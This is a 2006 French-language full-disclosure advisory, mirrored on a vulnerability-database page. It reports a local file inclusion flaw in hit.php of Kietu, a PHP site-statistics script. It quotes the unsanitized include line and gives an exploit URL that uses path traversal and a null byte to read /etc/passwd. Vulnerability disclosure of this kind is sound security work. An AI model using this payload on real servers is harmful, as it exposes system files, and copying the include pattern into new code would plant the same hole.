Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14408
HistorySep 25, 2006 - 12:00 a.m.

[Full-disclosure] Local File Inclusion : Kietu

2006-09-2500:00:00
vulners.com
27

[::] Produit : Kietu

[::] Langage : PHP

[::] Description : Kietu? est un script ecrit en PHP, qui
requiert une base de donnee mySQL, et qui vous permet de generer et
consulter les statistiques d'acces a votre site web.

[::] Site web officiel : http://www.Kietu.net/

[::] Page vulnerable : hit.php

[::] Faille de securite : Local File Inclusion

[::] Code vulnerable : ( Ligne 2 ) -> include_once
$url_hit.'class/kdetect.class.php';

[::] Exploitation :
http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00

@ [::] Credit : Avis de securite par cdg393 ->
cdg393_gmail_com :)